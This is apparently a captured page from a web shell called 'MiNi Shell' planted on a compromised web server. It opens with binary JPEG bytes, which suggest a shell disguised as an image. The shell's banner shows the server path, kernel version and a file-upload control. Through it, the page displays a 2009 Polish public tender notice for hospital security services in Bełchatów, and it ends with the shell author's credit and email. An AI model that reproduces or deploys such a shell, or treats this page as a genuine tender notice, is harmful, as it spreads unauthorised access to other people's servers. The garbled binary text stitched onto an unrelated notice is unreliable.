JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/64115-N-2009.html

<p class="kh_header"><b>Bełchatów: USŁUGI OCHRONY OSÓB I MIENIA w Szpitalu Wojewódzkim im. Jana Pawła II w Bełchatowie</b><br>
<b>Numer ogłoszenia: 64115 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. Jana Pawła II , ul. Czapliniecka 123, 97-400 Bełchatów, woj. łódzkie, tel. 044 6358236, faks (0-44) 63 58 208.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-belchatow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI OCHRONY OSÓB I MIENIA w Szpitalu Wojewódzkim im. Jana Pawła II w Bełchatowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1.	Opis, wielkość i zakres:
                  1)  Usługodawca powierza, a Usługobiorca przyjmuje na siebie obowiązek świadczenia całodobowej usługi ochrony 
                       osób i mienia w Szpitalu Wojewódzkim im. Jana Pawła II w Bełchatowie.
    2) Zakres prac obejmuje całodobowy dyżur w budynku głównym oraz portierni w zakresie i na zasadach
         określonych w instrukcjach stanowiskowych, stanowiących załącznik do umowy.
    3)  Usługobiorca w ramach umowy zobowiązany jest do następujących czynności:
            a)	świadczenia na rzecz Usługodawcy usługi stałej, bezpośredniej ochrony fizycznej osób i mienia Usługodawcy
                 oraz Magazynu Rezerw Państwowych Służby Zdrowia, w tym mienia składającego się z budynków
                 wskazanych w załączniku do SIWZ (wykaz budynków oraz plan terenu szpitala) i pomieszczeń w nich
                 zlokalizowanych oraz rzeczy znajdujących się w tych pomieszczeniach;
            b)	czuwania nad bezpieczeństwem pracowników Szpitala, pacjentów i osób odwiedzających;
   c) zainstalowania na koszt własny systemu monitorowania obchodów, wymuszającego na pracownikach
        ochrony stałe, nieregularne obchody w ciągu doby (minimum 6). Każdy obchód ma być rejestrowany 
        z dokładnością do minuty i na żądanie Usługodawcy drukowany oraz udostępniany do wglądu;
            d)  dysponowania w sytuacjach wymagającej przymusu bezpośredniego, grupą interwencyjną -  dopuszczalne
                  jest korzystanie z usług podwykonawcy;
                e) 	zapewnienia profesjonalnych środków łączności, jednolitych uniformów i identyfikatorów ze zdjęciem swoim
                     pracownikom ochrony; 
                f) 	stosowania się do pisemnych poleceń i wskazówek Usługodawcy w trakcie
  		wykonywania usługi, tj.:
- 	prowadzenia /Książki dyżurów/, do której pracownicy Usługobiorcy będą wpisywać wszelkie
                             spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony mienia
                             Usługodawcy, 
- 	w terminie do piątego dnia następującego po miesiącu świadczenia usług, Usługobiorca składać będzie Usługodawcy miesięczną  Książkę dyżurów, o której mowa wyżej, prowadzoną 
w poprzednim miesiącu;
            g)  	pracownik koordynujący usługę ochrony szpitala z ramienia Usługobiorcy pozostaje dostępny osobiście 
                 dla Usługodawcy codziennie od poniedziałku do piątku w godzinach od 8:00 do 14:35, a poza tymi
                 godzinami będzie możliwy z nim kontakt za pośrednictwem telefonu komórkowego;
h)  	Usługobiorca zobowiązany jest do przedłożenia w terminie 7 dni od złożenia przez Usługodawcę pisemnego
       żądania - wszelkich dokumentów, materiałów i informacji koniecznych do oceny prawidłowości wykonania
       umowy;
         4.2. Szczegółowy zakres obowiązków Wykonawcy w ramach przedmiotu zamówienia regulują postanowienia  SIWZ, 
                 w tym wzór umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu: 
     O zamówienie  mogą  ubiegać  się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 oraz nie podlegają
     wykluczeniu z udziału w postępowaniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień
     publicznych /Dz. U. z 2007r. Nr 223, poz. 1655, z późn. zm./, a ponadto złożą oświadczenia zgodnie z Załącznikiem nr 1 
     do SIWZ - druk OFERTA i dokumenty wymienione w Rozdz. VI SIWZ.
Opis warunków udziału w postępowaniu oraz oceny ich spełnienia:
            1) Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności i nie podlega 
                  wykluczeniu na podstawie art. 24 ustawy - Pzp, zgodnie z informacjami zawartymi w dokumentach, o których
                  mowa w Rozdz. VI pkt 2 SIWZ;
            2)  Wykonawca posiada niezbędną wiedzę i doświadczenie (wykonane lub wykonywane co najmniej 2 usługi) oraz
                  dysponuje lub będzie dysponował potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zgodnie
                  z informacjami zawartymi w dokumentach, o których mowa w Rozdz. VI pkt 3 SIWZ;
            3)  Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn. jest
                  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnie z Rozdz. VI pkt 4 ppkt 1
                  SIWZ.
            Zamawiający dokonana oceny spełnienia warunków udziału w postępowaniu systemem: spełnia / nie spełnia (druk   
            ZP-17), na podstawie załączonych do oferty dokumentów lub oświadczeń, zgodnie z wymaganiami Zamawiającego 
            określonymi w niniejszej specyfikacji. Dokumenty wymagane od Wykonawców w celu potwierdzenia spełnienia 
            warunków udziału w postępowaniu, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006r. 
            w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te 
            dokumenty  mogą być składane - par. 1 ust. 1 pkt 1,2, 4 i 5; par. 1 ust. 2 pkt 2, 3, 5 i 6,; par. 1 ust. 3 pkt 3 (Dz. U. 
            z 2006r. Nr 87, poz. 605; Dz. U. z 2008r. Nr 188, poz. 1155, ze zmianami). Ponadto Wykonawca składa wraz z ofertą
            wymagane procedurą druki, formularze oraz inne dodatkowe dokumenty, wynikające z zapisów SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty potwierdzające spełnienie warunków udziału  w postępowaniu
1. Wykonawca zgodnie z art. 44 ustawy - Pzp składa wraz z ofertą oświadczenie o spełnianiu warunków  
     udziału w postępowaniu, o których mowa w art. 22 ust. 1 oraz  o niepodleganiu wykluczeniu 
     z postępowania o zamówienie publiczne na podstawie art. 24 ustaw y (patrz: druk OFERTA).    
            2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności    
                 oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia  29 stycznia 2004r. - Prawo zamówień   
                 publicznych, wraz z ofertą należy złożyć następujące dokumenty:
                  1)    koncesja na podjęcie działalności  gospodarczej w zakresie objętym przedmiotowym zamówieniem
                             publicznym;
    2) 	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli  odrębne  przepisy  wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej,
-  	wystawiony lub poświadczony pod względem aktualności przez uprawniony do wystawienia organ nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
                  3) 	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
                             pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
            4) 	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 
                       ust. 1 pkt 9 ustawy (dotyczy podmiotów zbiorowych), wystawiona nie wcześniej niż 6 miesięcy przed 
                       upływem terminu składania ofert;
  3.  W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy 
                 i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
                 Zamawiający żąda następujących dokumentów:
	      	   1)	wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, 
                    co najmniej 2-óch usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania 
                    o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
                    odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości,
                    przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te
                    usługi zostały wykonane należycie (np. opinie, referencje),
                            -   łączna wartość usług przedstawionych w wykazie nie może być mniejsza niż całkowita wartość
                           wynikająca ze złożonej oferty przetargowej;
	                 2)	wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie
                    dysponował wykonawca,
                             -  dodatkowo wykonawca załącza do oferty pisemne zobowiązanie innych podmiotów do udostępnienia
                          niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, wykonawca wskazał 
                          narzędzia i urządzenia, którymi będzie dysponował;
		        3)	wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć 
                     w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
                     i wykształcenia niezbędnych do wykonania zamówienia, a także zakresie wykonywanych przez nie
                     czynności,
                             -   dodatkowo wykonawca załącza do oferty pisemne zobowiązanie innych podmiotów do udostępnienia
                           osób zdolnych do wykonania zamówienia, jeżeli w wykazie, wykonawca wskazał osoby, którymi będzie
                           dysponował;
                             Zamawiający oczekuje uwzględnienia w wykazie pracowników organizujących i kierujących zespołem
                     pracowników ochrony jak również pracowników bezpośrednio wykonujących usługę ochrony. Tym samym
                     należy wskazać ich kwalifikacje tj. licencje dla pracowników organizujących i kierujących, natomiast 
                     dla pozostałych pracowników ochrony jeśli posiadają - ukończone kursy, szkolenia itp., tematycznie
                     związane z usługą ochrony;
                     4)	 stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane
                      uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.:
                              -   licencje dla pracowników organizujących i kierujących zespołem pracowników ochrony;                
          4. 	   W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji
                 ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda następującego dokumentu:
	                 1 )	polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony 
                     od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę co najmniej 500.000,00 PLN;
          5.    Oferta, załączniki i inne wymagane procedurą dokumenty:  
                 1)   Druk OFERTA /wg załączonego wzoru druku - Załącznik nr 1 do SIWZ/;
   2) pełnomocnictwo(-a) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo  
                       reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego -  
                       udzielone osobom nie wymienionym w dokumencie, o którym mowa w Rozdziale VI pkt 2 ppkt 2), 
                       a reprezentującym Wykonawcę, w szczególności poprzez podpisywanie / poświadczanie dokumentów  
                       składających się na ofertę oraz innych dokumentów składanych w toku postępowania.
          6.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast
                 dokumentów, o których mowa:
      1) 	W pkt 2 ppkt 2 i 4 składa dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce
                 zamieszkania, potwierdzające, odpowiednio, że:
	                     a)  	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
    	b) 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
    2) 	W pkt 2 ppkt. 3 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju
                    pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 
                    pkt 4-8 ustawy - Pzp.
           7. Dokumenty o których  mowa w pkt 6 ppkt 1) lit. a i b oraz ppkt 2), powinny być wystawione nie wcześniej 
                niż 6 miesięcy przed upływem terminu składania ofert. 
           8. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, 
                nie wydaje się dokumentów, o których mowa w pkt 6 zastępuje się je dokumentami zawierającymi oświadczenie
                złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego
                lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę 
                lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-belchatow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki im. Jana Pawła II w Bełchatowie, 97-400 Bełchatów, 
ul. Czapliniecka 123 -  w Sekcji zamówień publicznych (pok. nr 92).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2009 godzina 11:00, miejsce: Szpital Wojewódzki im. Jana Pawła II w Bełchatowie, 97-400 Bełchatów, 
ul. Czapliniecka 123 -  w sekretariacie Z-cy Dyrektora ds. Ekonomicznych (pok. nr 18)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com